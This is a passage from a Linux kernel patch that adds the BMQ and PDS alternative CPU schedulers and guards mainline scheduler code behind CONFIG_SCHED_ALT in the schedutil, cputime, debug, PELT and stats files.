++static inline int best_mask_cpu(int cpu, const cpumask_t *mask)
++{
++	return __best_mask_cpu(mask, per_cpu(sched_cpu_topo_masks, cpu));
++}
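++
++/*
++ * Illustrative only: given the topology masks built at boot,
++ * best_mask_cpu(0, &candidates) scans the levels closest-first, i.e.
++ * cpu0 itself, then its SMT siblings, then the LLC, and so on, and
++ * returns the first candidate CPU found.
++ */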
++
++extern void flush_smp_call_function_queue(void);
++
++#else  /* !CONFIG_SMP */
++static inline void flush_smp_call_function_queue(void) { }
++#endif
++
++#ifndef arch_scale_freq_tick
++static __always_inline
++void arch_scale_freq_tick(void)
++{
++}
++#endif
++
++#ifndef arch_scale_freq_capacity
++static __always_inline
++unsigned long arch_scale_freq_capacity(int cpu)
++{
++	return SCHED_CAPACITY_SCALE;
++}
++#endif
++
++static inline u64 __rq_clock_broken(struct rq *rq)
++{
++	return READ_ONCE(rq->clock);
++}
++
++static inline u64 rq_clock(struct rq *rq)
++{
++	/*
++	 * Relax lockdep_assert_held() checking as in VRQ: callers of
++	 * sched_info_xxxx() may not hold rq->lock, hence the disabled assert:
++	 * lockdep_assert_held(&rq->lock);
++	 */
++	return rq->clock;
++}
++
++static inline u64 rq_clock_task(struct rq *rq)
++{
++	/*
++	 * Relax lockdep_assert_held() checking as in VRQ: callers of
++	 * sched_info_xxxx() may not hold rq->lock, hence the disabled assert:
++	 * lockdep_assert_held(&rq->lock);
++	 */
++	return rq->clock_task;
++}
++
++/*
++ * {de,en}queue flags:
++ *
++ * DEQUEUE_SLEEP  - task is no longer runnable
++ * ENQUEUE_WAKEUP - task just became runnable
++ *
++ */
++
++#define DEQUEUE_SLEEP		0x01
++
++#define ENQUEUE_WAKEUP		0x01
++
++
++/*
++ * Below are scheduler APIs used by other kernel code.
++ * They take a dummy rq_flags argument.
++ * TODO: BMQ needs to support these APIs for compatibility with mainline
++ * scheduler code.
++ */
++struct rq_flags {
++	unsigned long flags;
++};
++
++struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(rq->lock);
++
++struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(p->pi_lock)
++	__acquires(rq->lock);
++
++static inline void __task_rq_unlock(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock(&rq->lock);
++}
++
++static inline void
++task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
++	__releases(rq->lock)
++	__releases(p->pi_lock)
++{
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
++}
++
++static inline void
++rq_lock(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock(&rq->lock);
++}
++
++static inline void
++rq_unlock(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock(&rq->lock);
++}
++
++static inline void
++rq_lock_irq(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irq(&rq->lock);
++}
++
++static inline void
++rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock_irq(&rq->lock);
++}
++
++static inline struct rq *
++this_rq_lock_irq(struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	local_irq_disable();
++	rq = this_rq();
++	raw_spin_lock(&rq->lock);
++
++	return rq;
++}
++
++static inline raw_spinlock_t *__rq_lockp(struct rq *rq)
++{
++	return &rq->lock;
++}
++
++static inline raw_spinlock_t *rq_lockp(struct rq *rq)
++{
++	return __rq_lockp(rq);
++}
++
++static inline void lockdep_assert_rq_held(struct rq *rq)
++{
++	lockdep_assert_held(__rq_lockp(rq));
++}
++
++extern void raw_spin_rq_lock_nested(struct rq *rq, int subclass);
++extern void raw_spin_rq_unlock(struct rq *rq);
++
++static inline void raw_spin_rq_lock(struct rq *rq)
++{
++	raw_spin_rq_lock_nested(rq, 0);
++}
++
++static inline void raw_spin_rq_lock_irq(struct rq *rq)
++{
++	local_irq_disable();
++	raw_spin_rq_lock(rq);
++}
++
++static inline void raw_spin_rq_unlock_irq(struct rq *rq)
++{
++	raw_spin_rq_unlock(rq);
++	local_irq_enable();
++}
++
++static inline int task_current(struct rq *rq, struct task_struct *p)
++{
++	return rq->curr == p;
++}
++
++static inline bool task_on_cpu(struct task_struct *p)
++{
++	return p->on_cpu;
++}
++
++extern int task_running_nice(struct task_struct *p);
++
++extern struct static_key_false sched_schedstats;
++
++#ifdef CONFIG_CPU_IDLE
++static inline void idle_set_state(struct rq *rq,
++				  struct cpuidle_state *idle_state)
++{
++	rq->idle_state = idle_state;
++}
++
++static inline struct cpuidle_state *idle_get_state(struct rq *rq)
++{
++	WARN_ON(!rcu_read_lock_held());
++	return rq->idle_state;
++}
++#else
++static inline void idle_set_state(struct rq *rq,
++				  struct cpuidle_state *idle_state)
++{
++}
++
++static inline struct cpuidle_state *idle_get_state(struct rq *rq)
++{
++	return NULL;
++}
++#endif
++
++static inline int cpu_of(const struct rq *rq)
++{
++#ifdef CONFIG_SMP
++	return rq->cpu;
++#else
++	return 0;
++#endif
++}
++
++#include "stats.h"
++
++#ifdef CONFIG_NO_HZ_COMMON
++#define NOHZ_BALANCE_KICK_BIT	0
++#define NOHZ_STATS_KICK_BIT	1
++
++#define NOHZ_BALANCE_KICK	BIT(NOHZ_BALANCE_KICK_BIT)
++#define NOHZ_STATS_KICK		BIT(NOHZ_STATS_KICK_BIT)
++
++#define NOHZ_KICK_MASK	(NOHZ_BALANCE_KICK | NOHZ_STATS_KICK)
++
++#define nohz_flags(cpu)	(&cpu_rq(cpu)->nohz_flags)
++
++/* TODO: needed?
++extern void nohz_balance_exit_idle(struct rq *rq);
++#else
++static inline void nohz_balance_exit_idle(struct rq *rq) { }
++*/
++#endif
++
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++struct irqtime {
++	u64			total;
++	u64			tick_delta;
++	u64			irq_start_time;
++	struct u64_stats_sync	sync;
++};
++
++DECLARE_PER_CPU(struct irqtime, cpu_irqtime);
++
++/*
++ * Returns the irqtime minus the softirq time computed by ksoftirqd.
++ * Otherwise ksoftirqd's sum_exec_runtime would have its own runtime
++ * subtracted and would never move forward.
++ */
++static inline u64 irq_time_read(int cpu)
++{
++	struct irqtime *irqtime = &per_cpu(cpu_irqtime, cpu);
++	unsigned int seq;
++	u64 total;
++
++	do {
++		seq = __u64_stats_fetch_begin(&irqtime->sync);
++		total = irqtime->total;
++	} while (__u64_stats_fetch_retry(&irqtime->sync, seq));
++
++	return total;
++}
++#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
++
++#ifdef CONFIG_CPU_FREQ
++DECLARE_PER_CPU(struct update_util_data __rcu *, cpufreq_update_util_data);
++#endif /* CONFIG_CPU_FREQ */
++
++#ifdef CONFIG_NO_HZ_FULL
++extern int __init sched_tick_offload_init(void);
++#else
++static inline int sched_tick_offload_init(void) { return 0; }
++#endif
++
++#ifdef arch_scale_freq_capacity
++#ifndef arch_scale_freq_invariant
++#define arch_scale_freq_invariant()	(true)
++#endif
++#else /* arch_scale_freq_capacity */
++#define arch_scale_freq_invariant()	(false)
++#endif
++
++extern void schedule_idle(void);
++
++#define cap_scale(v, s) ((v)*(s) >> SCHED_CAPACITY_SHIFT)
++
++/*
++ * !! For sched_setattr_nocheck() (kernel) only !!
++ *
++ * This is actually gross. :(
++ *
++ * It is used to make schedutil kworker(s) higher priority than SCHED_DEADLINE
++ * tasks, but still be able to sleep. We need this on platforms that cannot
++ * atomically change clock frequency. Remove once fast switching will be
++ * available on such platforms.
++ *
++ * SUGOV stands for SchedUtil GOVernor.
++ */
++#define SCHED_FLAG_SUGOV	0x10000000
++
++#ifdef CONFIG_MEMBARRIER
++/*
++ * The scheduler provides memory barriers required by membarrier between:
++ * - prior user-space memory accesses and store to rq->membarrier_state,
++ * - store to rq->membarrier_state and following user-space memory accesses.
++ * In the same way it provides those guarantees around store to rq->curr.
++ */
++static inline void membarrier_switch_mm(struct rq *rq,
++					struct mm_struct *prev_mm,
++					struct mm_struct *next_mm)
++{
++	int membarrier_state;
++
++	if (prev_mm == next_mm)
++		return;
++
++	membarrier_state = atomic_read(&next_mm->membarrier_state);
++	if (READ_ONCE(rq->membarrier_state) == membarrier_state)
++		return;
++
++	WRITE_ONCE(rq->membarrier_state, membarrier_state);
++}
++#else
++static inline void membarrier_switch_mm(struct rq *rq,
++					struct mm_struct *prev_mm,
++					struct mm_struct *next_mm)
++{
++}
++#endif
++
++#ifdef CONFIG_NUMA
++extern int sched_numa_find_closest(const struct cpumask *cpus, int cpu);
++#else
++static inline int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
++{
++	return nr_cpu_ids;
++}
++#endif
++
++extern void swake_up_all_locked(struct swait_queue_head *q);
++extern void __prepare_to_swait(struct swait_queue_head *q, struct swait_queue *wait);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++extern int preempt_dynamic_mode;
++extern int sched_dynamic_mode(const char *str);
++extern void sched_dynamic_update(int mode);
++#endif
++
++static inline void nohz_run_idle_balance(int cpu) { }
++
++static inline
++unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
++				  struct task_struct *p)
++{
++	return util;
++}
++
++static inline bool uclamp_rq_is_capped(struct rq *rq) { return false; }
++
++#endif /* ALT_SCHED_H */
+diff --git a/kernel/sched/bmq.h b/kernel/sched/bmq.h
+new file mode 100644
+index 000000000000..66b77291b9d0
+--- /dev/null
++++ b/kernel/sched/bmq.h
+@@ -0,0 +1,110 @@
++#define ALT_SCHED_VERSION_MSG "sched/bmq: BMQ CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
++
++/*
++ * BMQ only routines
++ */
++#define rq_switch_time(rq)	((rq)->clock - (rq)->last_ts_switch)
++#define boost_threshold(p)	(sched_timeslice_ns >>\
++				 (15 - MAX_PRIORITY_ADJ - (p)->boost_prio))
++
++static inline void boost_task(struct task_struct *p)
++{
++	int limit;
++
++	switch (p->policy) {
++	case SCHED_NORMAL:
++		limit = -MAX_PRIORITY_ADJ;
++		break;
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		limit = 0;
++		break;
++	default:
++		return;
++	}
++
++	if (p->boost_prio > limit)
++		p->boost_prio--;
++}
++
++static inline void deboost_task(struct task_struct *p)
++{
++	if (p->boost_prio < MAX_PRIORITY_ADJ)
++		p->boost_prio++;
++}
++
++/*
++ * Common interfaces
++ */
++static inline void sched_timeslice_imp(const int timeslice_ms) {}
++
++static inline int
++task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
++{
++	return p->prio + p->boost_prio - MAX_RT_PRIO;
++}
++
++static inline int task_sched_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio : MAX_RT_PRIO / 2 + (p->prio + p->boost_prio) / 2;
++}
++
++static inline int
++task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
++{
++	return task_sched_prio(p);
++}
++
++static inline int sched_prio2idx(int prio, struct rq *rq)
++{
++	return prio;
++}
++
++static inline int sched_idx2prio(int idx, struct rq *rq)
++{
++	return idx;
++}
++
++static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
++{
++	p->time_slice = sched_timeslice_ns;
++
++	if (SCHED_FIFO != p->policy && task_on_rq_queued(p)) {
++		if (SCHED_RR != p->policy)
++			deboost_task(p);
++		requeue_task(p, rq, task_sched_prio_idx(p, rq));
++	}
++}
++
++static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq) {}
++
++inline int task_running_nice(struct task_struct *p)
++{
++	return (p->prio + p->boost_prio > DEFAULT_PRIO + MAX_PRIORITY_ADJ);
++}
++
++static void sched_task_fork(struct task_struct *p, struct rq *rq)
++{
++	p->boost_prio = MAX_PRIORITY_ADJ;
++}
++
++static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
++{
++	p->boost_prio = MAX_PRIORITY_ADJ;
++}
++
++#ifdef CONFIG_SMP
++static inline void sched_task_ttwu(struct task_struct *p)
++{
++	if (this_rq()->clock_task - p->last_ran > sched_timeslice_ns)
++		boost_task(p);
++}
++#endif
++
++static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq)
++{
++	if (rq_switch_time(rq) < boost_threshold(p))
++		boost_task(p);
++}
++
++static inline void update_rq_time_edge(struct rq *rq) {}
+diff --git a/kernel/sched/build_policy.c b/kernel/sched/build_policy.c
+index d9dc9ab3773f..71a25540d65e 100644
+--- a/kernel/sched/build_policy.c
++++ b/kernel/sched/build_policy.c
+@@ -42,13 +42,19 @@
+
+ #include "idle.c"
+
++#ifndef CONFIG_SCHED_ALT
+ #include "rt.c"
++#endif
+
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ # include "cpudeadline.c"
++#endif
+ # include "pelt.c"
+ #endif
+
+ #include "cputime.c"
+-#include "deadline.c"
+
++#ifndef CONFIG_SCHED_ALT
++#include "deadline.c"
++#endif
+diff --git a/kernel/sched/build_utility.c b/kernel/sched/build_utility.c
+index 99bdd96f454f..23f80a86d2d7 100644
+--- a/kernel/sched/build_utility.c
++++ b/kernel/sched/build_utility.c
+@@ -85,7 +85,9 @@
+
+ #ifdef CONFIG_SMP
+ # include "cpupri.c"
++#ifndef CONFIG_SCHED_ALT
+ # include "stop_task.c"
++#endif
+ # include "topology.c"
+ #endif
+
+diff --git a/kernel/sched/cpufreq_schedutil.c b/kernel/sched/cpufreq_schedutil.c
+index 1207c78f85c1..68812e0756cb 100644
+--- a/kernel/sched/cpufreq_schedutil.c
++++ b/kernel/sched/cpufreq_schedutil.c
+@@ -159,9 +159,14 @@ static void sugov_get_util(struct sugov_cpu *sg_cpu)
+ 	struct rq *rq = cpu_rq(sg_cpu->cpu);
+
+ 	sg_cpu->max = arch_scale_cpu_capacity(sg_cpu->cpu);
++#ifndef CONFIG_SCHED_ALT
+ 	sg_cpu->bw_dl = cpu_bw_dl(rq);
+ 	sg_cpu->util = effective_cpu_util(sg_cpu->cpu, cpu_util_cfs(sg_cpu->cpu),
+ 					  FREQUENCY_UTIL, NULL);
++#else
++	sg_cpu->bw_dl = 0;
++	sg_cpu->util = rq_load_util(rq, sg_cpu->max);
++#endif /* CONFIG_SCHED_ALT */
+ }
+
+ /**
+@@ -305,8 +310,10 @@ static inline bool sugov_cpu_is_busy(struct sugov_cpu *sg_cpu) { return false; }
+  */
+ static inline void ignore_dl_rate_limit(struct sugov_cpu *sg_cpu)
+ {
++#ifndef CONFIG_SCHED_ALT
+ 	if (cpu_bw_dl(cpu_rq(sg_cpu->cpu)) > sg_cpu->bw_dl)
+ 		sg_cpu->sg_policy->limits_changed = true;
++#endif
+ }
+
+ static inline bool sugov_update_single_common(struct sugov_cpu *sg_cpu,
+@@ -606,6 +613,7 @@ static int sugov_kthread_create(struct sugov_policy *sg_policy)
+ 	}
+
+ 	ret = sched_setattr_nocheck(thread, &attr);
++
+ 	if (ret) {
+ 		kthread_stop(thread);
+ 		pr_warn("%s: failed to set SCHED_DEADLINE\n", __func__);
+@@ -838,7 +846,9 @@ cpufreq_governor_init(schedutil_gov);
+ #ifdef CONFIG_ENERGY_MODEL
+ static void rebuild_sd_workfn(struct work_struct *work)
+ {
++#ifndef CONFIG_SCHED_ALT
+ 	rebuild_sched_domains_energy();
++#endif /* CONFIG_SCHED_ALT */
+ }
+ static DECLARE_WORK(rebuild_sd_work, rebuild_sd_workfn);
+
+diff --git a/kernel/sched/cputime.c b/kernel/sched/cputime.c
+index 95fc77853743..b48b3f9ed47f 100644
+--- a/kernel/sched/cputime.c
++++ b/kernel/sched/cputime.c
+@@ -122,7 +122,7 @@ void account_user_time(struct task_struct *p, u64 cputime)
+ 	p->utime += cputime;
+ 	account_group_user_time(p, cputime);
+
+-	index = (task_nice(p) > 0) ? CPUTIME_NICE : CPUTIME_USER;
++	index = task_running_nice(p) ? CPUTIME_NICE : CPUTIME_USER;
+
+ 	/* Add user time to cpustat. */
+ 	task_group_account_field(p, index, cputime);
+@@ -146,7 +146,7 @@ void account_guest_time(struct task_struct *p, u64 cputime)
+ 	p->gtime += cputime;
+
+ 	/* Add guest time to cpustat. */
+-	if (task_nice(p) > 0) {
++	if (task_running_nice(p)) {
+ 		task_group_account_field(p, CPUTIME_NICE, cputime);
+ 		cpustat[CPUTIME_GUEST_NICE] += cputime;
+ 	} else {
+@@ -284,7 +284,7 @@ static inline u64 account_other_time(u64 max)
+ #ifdef CONFIG_64BIT
+ static inline u64 read_sum_exec_runtime(struct task_struct *t)
+ {
+-	return t->se.sum_exec_runtime;
++	return tsk_seruntime(t);
+ }
+ #else
+ static u64 read_sum_exec_runtime(struct task_struct *t)
+@@ -294,7 +294,7 @@ static u64 read_sum_exec_runtime(struct task_struct *t)
+ 	struct rq *rq;
+
+ 	rq = task_rq_lock(t, &rf);
+-	ns = t->se.sum_exec_runtime;
++	ns = tsk_seruntime(t);
+ 	task_rq_unlock(rq, t, &rf);
+
+ 	return ns;
+@@ -626,7 +626,7 @@ void cputime_adjust(struct task_cputime *curr, struct prev_cputime *prev,
+ void task_cputime_adjusted(struct task_struct *p, u64 *ut, u64 *st)
+ {
+ 	struct task_cputime cputime = {
+-		.sum_exec_runtime = p->se.sum_exec_runtime,
++		.sum_exec_runtime = tsk_seruntime(p),
+ 	};
+
+ 	if (task_cputime(p, &cputime.utime, &cputime.stime))
+diff --git a/kernel/sched/debug.c b/kernel/sched/debug.c
+index 1637b65ba07a..033c6deeb515 100644
+--- a/kernel/sched/debug.c
++++ b/kernel/sched/debug.c
+@@ -7,6 +7,7 @@
+  * Copyright(C) 2007, Red Hat, Inc., Ingo Molnar
+  */
+
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * This allows printing both to /proc/sched_debug and
+  * to the console
+@@ -215,6 +216,7 @@ static const struct file_operations sched_scaling_fops = {
+ };
+
+ #endif /* SMP */
++#endif /* !CONFIG_SCHED_ALT */
+
+ #ifdef CONFIG_PREEMPT_DYNAMIC
+
+@@ -278,6 +280,7 @@ static const struct file_operations sched_dynamic_fops = {
+
+ #endif /* CONFIG_PREEMPT_DYNAMIC */
+
++#ifndef CONFIG_SCHED_ALT
+ __read_mostly bool sched_debug_verbose;
+
+ static const struct seq_operations sched_debug_sops;
+@@ -293,6 +296,7 @@ static const struct file_operations sched_debug_fops = {
+ 	.llseek		= seq_lseek,
+ 	.release	= seq_release,
+ };
++#endif /* !CONFIG_SCHED_ALT */
+
+ static struct dentry *debugfs_sched;
+
+@@ -302,12 +306,15 @@ static __init int sched_init_debug(void)
+
+ 	debugfs_sched = debugfs_create_dir("sched", NULL);
+
++#ifndef CONFIG_SCHED_ALT
+ 	debugfs_create_file("features", 0644, debugfs_sched, NULL, &sched_feat_fops);
+ 	debugfs_create_bool("verbose", 0644, debugfs_sched, &sched_debug_verbose);
++#endif /* !CONFIG_SCHED_ALT */
+ #ifdef CONFIG_PREEMPT_DYNAMIC
+ 	debugfs_create_file("preempt", 0644, debugfs_sched, NULL, &sched_dynamic_fops);
+ #endif
+
++#ifndef CONFIG_SCHED_ALT
+ 	debugfs_create_u32("latency_ns", 0644, debugfs_sched, &sysctl_sched_latency);
+ 	debugfs_create_u32("min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_min_granularity);
+ 	debugfs_create_u32("idle_min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_idle_min_granularity);
+@@ -337,11 +344,13 @@ static __init int sched_init_debug(void)
+ #endif
+
+ 	debugfs_create_file("debug", 0444, debugfs_sched, NULL, &sched_debug_fops);
++#endif /* !CONFIG_SCHED_ALT */
+
+ 	return 0;
+ }
+ late_initcall(sched_init_debug);
+
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_SMP
+
+ static cpumask_var_t		sd_sysctl_cpus;
+@@ -1068,6 +1077,7 @@ void proc_sched_set_task(struct task_struct *p)
+ 	memset(&p->stats, 0, sizeof(p->stats));
+ #endif
+ }
++#endif /* !CONFIG_SCHED_ALT */
+
+ void resched_latency_warn(int cpu, u64 latency)
+ {
+diff --git a/kernel/sched/idle.c b/kernel/sched/idle.c
+index f26ab2675f7d..480d4ad16d45 100644
+--- a/kernel/sched/idle.c
++++ b/kernel/sched/idle.c
+@@ -400,6 +400,7 @@ void cpu_startup_entry(enum cpuhp_state state)
+ 		do_idle();
+ }
+
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * idle-task scheduling class.
+  */
+@@ -521,3 +522,4 @@ DEFINE_SCHED_CLASS(idle) = {
+ 	.switched_to		= switched_to_idle,
+ 	.update_curr		= update_curr_idle,
+ };
++#endif
+diff --git a/kernel/sched/pds.h b/kernel/sched/pds.h
+new file mode 100644
+index 000000000000..56a649d02e49
+--- /dev/null
++++ b/kernel/sched/pds.h
+@@ -0,0 +1,127 @@
++#define ALT_SCHED_VERSION_MSG "sched/pds: PDS CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
++
++static int sched_timeslice_shift = 22;
++
++#define NORMAL_PRIO_MOD(x)	((x) & (NORMAL_PRIO_NUM - 1))
++
++/*
++ * Common interfaces
++ */
++static inline void sched_timeslice_imp(const int timeslice_ms)
++{
++	if (2 == timeslice_ms)
++		sched_timeslice_shift = 21;
++}
++
++static inline int
++task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
++{
++	s64 delta = p->deadline - rq->time_edge + NORMAL_PRIO_NUM - NICE_WIDTH;
++
++	if (WARN_ONCE(delta > NORMAL_PRIO_NUM - 1,
++		      "pds: task_sched_prio_normal() delta %lld\n", delta))
++		return NORMAL_PRIO_NUM - 1;
++
++	return (delta < 0) ? 0 : delta;
++}
++
++static inline int task_sched_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio :
++		MIN_NORMAL_PRIO + task_sched_prio_normal(p, task_rq(p));
++}
++
++static inline int
++task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio : MIN_NORMAL_PRIO +
++		NORMAL_PRIO_MOD(task_sched_prio_normal(p, rq) + rq->time_edge);
++}
++
++static inline int sched_prio2idx(int prio, struct rq *rq)
++{
++	return (IDLE_TASK_SCHED_PRIO == prio || prio < MAX_RT_PRIO) ? prio :
++		MIN_NORMAL_PRIO + NORMAL_PRIO_MOD((prio - MIN_NORMAL_PRIO) +
++						  rq->time_edge);
++}
++
++static inline int sched_idx2prio(int idx, struct rq *rq)
++{
++	return (idx < MAX_RT_PRIO) ? idx : MIN_NORMAL_PRIO +
++		NORMAL_PRIO_MOD((idx - MIN_NORMAL_PRIO) + NORMAL_PRIO_NUM -
++				NORMAL_PRIO_MOD(rq->time_edge));
++}
++
++static inline void sched_renew_deadline(struct task_struct *p, const struct rq *rq)
++{
++	if (p->prio >= MAX_RT_PRIO)
++		p->deadline = (rq->clock >> sched_timeslice_shift) +
++			p->static_prio - (MAX_PRIO - NICE_WIDTH);
++}
++
++int task_running_nice(struct task_struct *p)
++{
++	return (p->prio > DEFAULT_PRIO);
++}
++
++static inline void update_rq_time_edge(struct rq *rq)
++{
++	struct list_head head;
++	u64 old = rq->time_edge;
++	u64 now = rq->clock >> sched_timeslice_shift;
++	u64 prio, delta;
++
++	if (now == old)
++		return;
++
++	delta = min_t(u64, NORMAL_PRIO_NUM, now - old);
++	INIT_LIST_HEAD(&head);
++
++	for_each_set_bit(prio, &rq->queue.bitmap[2], delta)
++		list_splice_tail_init(rq->queue.heads + MIN_NORMAL_PRIO +
++				      NORMAL_PRIO_MOD(prio + old), &head);
++
++	rq->queue.bitmap[2] = (NORMAL_PRIO_NUM == delta) ? 0UL :
++		rq->queue.bitmap[2] >> delta;
++	rq->time_edge = now;
++	if (!list_empty(&head)) {
++		u64 idx = MIN_NORMAL_PRIO + NORMAL_PRIO_MOD(now);
++		struct task_struct *p;
++
++		list_for_each_entry(p, &head, sq_node)
++			p->sq_idx = idx;
++
++		list_splice(&head, rq->queue.heads + idx);
++		rq->queue.bitmap[2] |= 1UL;
++	}
++}
++
++static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
++{
++	p->time_slice = sched_timeslice_ns;
++	sched_renew_deadline(p, rq);
++	if (SCHED_FIFO != p->policy && task_on_rq_queued(p))
++		requeue_task(p, rq, task_sched_prio_idx(p, rq));
++}
++
++static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq)
++{
++	u64 max_dl = rq->time_edge + NICE_WIDTH - 1;
++	if (unlikely(p->deadline > max_dl))
++		p->deadline = max_dl;
++}
++
++static void sched_task_fork(struct task_struct *p, struct rq *rq)
++{
++	sched_renew_deadline(p, rq);
++}
++
++static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
++{
++	time_slice_expired(p, rq);
++}
++
++#ifdef CONFIG_SMP
++static inline void sched_task_ttwu(struct task_struct *p) {}
++#endif
++static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq) {}
+diff --git a/kernel/sched/pelt.c b/kernel/sched/pelt.c
+index 0f310768260c..bd38bf738fe9 100644
+--- a/kernel/sched/pelt.c
++++ b/kernel/sched/pelt.c
+@@ -266,6 +266,7 @@ ___update_load_avg(struct sched_avg *sa, unsigned long load)
+ 	WRITE_ONCE(sa->util_avg, sa->util_sum / divider);
+ }
+
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * sched_entity:
+  *
+@@ -383,8 +384,9 @@ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
+
+ 	return 0;
+ }
++#endif
+
+-#ifdef CONFIG_SCHED_THERMAL_PRESSURE
++#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
+ /*
+  * thermal:
+  *
+diff --git a/kernel/sched/pelt.h b/kernel/sched/pelt.h
+index 3a0e0dc28721..e8a7d84aa5a5 100644
+--- a/kernel/sched/pelt.h
++++ b/kernel/sched/pelt.h
+@@ -1,13 +1,15 @@
+ #ifdef CONFIG_SMP
+ #include "sched-pelt.h"
+
++#ifndef CONFIG_SCHED_ALT
+ int __update_load_avg_blocked_se(u64 now, struct sched_entity *se);
+ int __update_load_avg_se(u64 now, struct cfs_rq *cfs_rq, struct sched_entity *se);
+ int __update_load_avg_cfs_rq(u64 now, struct cfs_rq *cfs_rq);
+ int update_rt_rq_load_avg(u64 now, struct rq *rq, int running);
+ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running);
++#endif
+
+-#ifdef CONFIG_SCHED_THERMAL_PRESSURE
++#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
+ int update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity);
+
+ static inline u64 thermal_load_avg(struct rq *rq)
+@@ -44,6 +46,7 @@ static inline u32 get_pelt_divider(struct sched_avg *avg)
+ 	return PELT_MIN_DIVIDER + avg->period_contrib;
+ }
+
++#ifndef CONFIG_SCHED_ALT
+ static inline void cfs_se_util_change(struct sched_avg *avg)
+ {
+ 	unsigned int enqueued;
+@@ -180,9 +183,11 @@ static inline u64 cfs_rq_clock_pelt(struct cfs_rq *cfs_rq)
+ 	return rq_clock_pelt(rq_of(cfs_rq));
+ }
+ #endif
++#endif /* CONFIG_SCHED_ALT */
+
+ #else
+
++#ifndef CONFIG_SCHED_ALT
+ static inline int
+ update_cfs_rq_load_avg(u64 now, struct cfs_rq *cfs_rq)
+ {
+@@ -200,6 +205,7 @@ update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
+ {
+ 	return 0;
+ }
++#endif
+
+ static inline int
+ update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity)
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index a4a20046e586..c363693cd869 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -5,6 +5,10 @@
+ #ifndef _KERNEL_SCHED_SCHED_H
+ #define _KERNEL_SCHED_SCHED_H
+
++#ifdef CONFIG_SCHED_ALT
++#include "alt_sched.h"
++#else
++
+ #include <linux/sched/affinity.h>
+ #include <linux/sched/autogroup.h>
+ #include <linux/sched/cpufreq.h>
+@@ -3183,4 +3187,9 @@ static inline void update_current_exec_runtime(struct task_struct *curr,
+ 	cgroup_account_cputime(curr, delta_exec);
+ }
+
++static inline int task_running_nice(struct task_struct *p)
++{
++	return (task_nice(p) > 0);
++}
++#endif /* !CONFIG_SCHED_ALT */
+ #endif /* _KERNEL_SCHED_SCHED_H */
+diff --git a/kernel/sched/stats.c b/kernel/sched/stats.c
+index 857f837f52cb..5486c63e4790 100644
+--- a/kernel/sched/stats.c
++++ b/kernel/sched/stats.c
+@@ -125,8 +125,10 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 	} else {
+ 		struct rq *rq;
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 		struct sched_domain *sd;
+ 		int dcount = 0;
++#endif
+ #endif
+ 		cpu = (unsigned long)(v - 2);
+ 		rq = cpu_rq(cpu);
+@@ -143,6 +145,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 		seq_printf(seq, "\n");
+
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 		/* domain-specific stats */
+ 		rcu_read_lock();
+ 		for_each_domain(cpu, sd) {
+@@ -171,6 +174,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 			    sd->ttwu_move_balance);
+ 		}
+ 		rcu_read_unlock();
++#endif
+ #endif
+ 	}
+ 	return 0;
+diff --git a/kernel/sched/stats.h b/kernel/sched/stats.h
+index 84a188913cc9..53934e7ef5db 100644
+--- a/kernel/sched/stats.h
++++ b/kernel/sched/stats.h
